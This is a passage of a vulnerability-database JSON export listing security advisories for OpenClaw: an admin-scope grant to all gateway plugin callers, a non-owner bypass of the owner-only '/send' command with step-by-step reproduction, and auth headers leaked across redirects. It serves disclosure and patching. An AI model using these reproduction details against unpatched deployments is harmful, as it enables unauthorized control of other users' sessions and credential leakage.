hyc-33fu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91262?format=json","vulnerability_id":"VCID-j92n-5217-9bhj","summary":"OpenClaw: Gateway Plugin HTTP Auth Grants Unrestricted operator.admin Runtime Scope to All Callers\n## Summary\n\nGateway Plugin HTTP auth: \"gateway\" Mints operator.admin Runtime Scope\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nGateway-authenticated plugin HTTP routes previously created a runtime scope set that included `operator.admin` regardless of caller-granted scopes. Commit `ec2dbcff9afd8a52e00de054b506c91726d9fbbe` keeps plugin HTTP runtime scopes least-privileged and preserves caller scope boundaries.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `ec2dbcff9afd8a52e00de054b506c91726d9fbbe`.\n\n## Fix Commit(s)\n\n- `ec2dbcff9afd8a52e00de054b506c91726d9fbbe`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35669","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15986","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1603","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1604","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35669"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ec2dbcff9afd8a52e00de054b506c91726d9fbbe","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:16Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ec2dbcff9afd8a52e00de054b506c91726d9fbbe"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qm2m-28pf-hgjw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:16Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qm2m-28pf-hgjw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35669","reference_id":"CVE-2026-35669","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35669"},{"reference_url":"https://github.com/advisories/GHSA-qm2m-28pf-hgjw","reference_id":"GHSA-qm2m-28pf-hgjw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qm2m-28pf-hgjw"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication-scope","reference_id":"openclaw-privilege-escalation-via-gateway-plugin-http-authentication-scope","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:16Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication-scope"}],"fixed_packages":[],"aliases":["CVE-2026-35669","GHSA-qm2m-28pf-hgjw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j92n-5217-9bhj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91382?format=json","vulnerability_id":"VCID-j96c-kau3-7fag","summary":"OpenClaw: Non-owner command-authorized sender can change the owner-only `/send` session delivery policy\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n**Title**  \nNon-owner command-authorized sender can change the owner-only `/send` session delivery policy\n\n**CWE**  \nCWE-285 Improper Authorization\n\n**CVSS v3.1**  \nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L  \nBase score: **5.4 (Medium)**\n\n**Severity Assessment**  \nMedium. This is a real owner-only authorization bypass, but the demonstrated impact is limited to persistent mutation of the current session’s delivery policy rather than direct code execution, sandbox escape, or cross-host compromise.\n\n**Impact**  \nA non-owner sender who is allowed to run commands can invoke `/send on|off|inherit` and persistently change the current session’s `sendPolicy`, even though OpenClaw documents `/send` as owner-only.\n\nThat lets a lower-trust participant:\n- disable reply delivery for the current session (`/send off`), suppressing future replies in that chat;\n- re-enable reply delivery (`/send on`) after the owner intentionally disabled it;\n- remove the session override (`/send inherit`).\n\n**Affected Component**  \nVerified against the latest published GitHub release tag `v2026.3.23` (`ccfeecb6887cd97937e33a71877ad512741e82b2`), published `2026-03-23T23:15:50Z`.\n\nExact vulnerable path on the shipped tag:\n- `src/auto-reply/reply/commands-session.ts:212-239`\n  - `handleSendPolicyCommand(...)` checks only `params.command.isAuthorizedSender`.\n  - when true, it mutates `params.sessionEntry.sendPolicy` and persists the session entry.\n\nAuthorization behavior that makes this reachable:\n- `src/auto-reply/command-auth.ts:401-407`\n  - `senderIsOwner` is computed separately from general command authorization.\n- `src/auto-reply/command-auth.ts:420-429`\n  - command authorization can succeed even when `senderIsOwner === false`.\n- `src/auto-reply/command-auth.owner-default.test.ts:10-47`\n  - existing coverage confirms a sender can be command-authorized while not treated as owner.\n\nDocumented owner-only contract:\n- `docs/tools/slash-commands.md:112`\n  - `/send on|off|inherit` is documented as owner-only.\n- `docs/concepts/session-tool.md:156`\n  - `sendPolicy` is documented as settable via `sessions.patch` or owner-only `/send on|off|inherit`.\n\nRelated privilege model:\n- `src/gateway/method-scopes.ts:131-133`\n  - `sessions.patch` is admin-scoped, which reinforces that session-delivery-policy mutation is treated as privileged state.\n\nVersion history:\n- The vulnerable handler exists in release history going back at least to commit `ea018a68ccb92dbc735bc1df9880d5c95c63ca35` (`refactor(auto-reply): split reply pipeline`).\n- Earliest released affected tag found: `v2026.1.14-1`\n- Latest released affected tag verified: `v2026.3.23`\n\n**Technical Reproduction**  \n1. Check out the shipped release tag `v2026.3.23`.\n2. Configure a channel where:\n   - a non-owner sender is allowed to run commands, for example through `commands.allowFrom`;\n   - the owner identity is distinct, for example via `commands.ownerAllowFrom`.\n3. Start or reuse a session with a live `sessionEntry` and `sessionStore`.\n4. Send `/send off` as the non-owner but command-authorized sender.\n5. Confirm the resolved command context has:\n   - `isAuthorizedSender === true`\n   - `senderIsOwner === false`\n6. Observe that the handler still accepts the command, mutates `sessionEntry.sendPolicy`, and persists the session entry.\n\n**Demonstrated Impact**  \nThe vulnerable handler performs a real persistent session-state change:\n- `src/auto-reply/reply/commands-session.ts:232-238`\n  - `/send inherit` deletes `sessionEntry.sendPolicy`\n  - other modes assign `sessionEntry.sendPolicy = sendPolicyCommand.mode`\n  - the handler then calls `persistSessionEntry(params)`\n\nThe mutation is not gated by owner status, only by general command authorization.\n\nThat changes subsequent delivery behavior for the current session, which matches the documented meaning of `sendPolicy`.\n\n**Environment**  \n- Product: OpenClaw\n- Verified shipped tag: `v2026.3.23`\n- Shipped tag commit: `ccfeecb6887cd97937e33a71877ad512741e82b2`\n- Published GitHub release time: `2026-03-23T23:15:50Z`\n- Verification date: `2026-03-24`\n\n**Duplicate Check**  \nUpon inspection there is no preexisting GHSA for `/send`.\n\nThis is distinct from:\n- `GHSA-r7vr-gr74-94p8`\n  - that advisory covered owner-only authorization bypasses for `/config` and `/debug`, not `/send`.\n\nThis is the same authorization class, but a different privileged command surface that still lacks the owner check.\n\n**In Scope Check**  \nThis report is in scope under `SECURITY.md` because:\n- it does **not** rely on adversarial operators sharing one gateway host or config;\n- it does **not** rely on trusted local state tampering;\n- `SECURITY.md:151-152` explicitly says non-owner sender status matters for owner-only tools and commands;\n- `/send` is explicitly documented as owner-only, so this is a direct owner-only authorization bypass, not a complaint about normal shared-agent steering.\n\nThis is therefore a concrete authorization flaw against a documented product boundary.\n\n**Remediation Advice**  \n1. Change `/send` to require owner status, not just command authorization.\n2. Reuse the same owner-only rejection pattern already used by privileged command surfaces such as `/config`, `/debug`, and owner-only `/plugins` writes.\n3. Add regression coverage for the exact case where:\n   - a non-owner sender is command-authorized;\n   - `/send` must still be rejected unless `senderIsOwner === true`.\n4. Verify that the owner can still use `/send on|off|inherit` normally.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35620","reference_id":"","reference_type":"","scores":[{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20449","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20489","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20501","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35620"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/555b2578a8cc6e1b93f717496935ead97bfbed8b","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"}],"url":"https://github.com/openclaw/openclaw/commit/555b2578a8cc6e1b93f717496935ead97bfbed8b"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ea018a68ccb92dbc735bc1df9880d5c95c63ca35","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ea018a68ccb92dbc735bc1df9880d5c95c63ca35"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-39mp-545q-w789","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-39mp-545q-w789"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35620","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35620"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-missing-authorization-in-send-and-allowlist-chat-commands","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-missing-authorization-in-send-and-allowlist-chat-commands"},{"reference_url":"https://github.com/advisories/GHSA-39mp-545q-w789","reference_id":"GHSA-39mp-545q-w789","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-39mp-545q-w789"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35620","GHSA-39mp-545q-w789"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j96c-kau3-7fag"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50758?format=json","vulnerability_id":"VCID-jad8-5duz-dqg1","summary":"OpenClaw: fetch-guard forwards custom authorization headers across cross-origin redirects\nOpenClaw's `fetchWithSsrFGuard(...)` followed cross-origin redirects while preserving arbitrary caller-supplied headers except for a narrow denylist (`Authorization`, `Proxy-Authorization`, `Cookie`, `Cookie2`). This allowed custom authorization headers such as `X-Api-Key`, `Private-Token`, and similar sensitive headers to be forwarded to a different origin after a redirect.\n\nThe fix switches cross-origin redirect handling from a narrow sensitive-header denylist to a safe-header allowlist, so only benign headers such as content negotiation and cache validators survive an origin 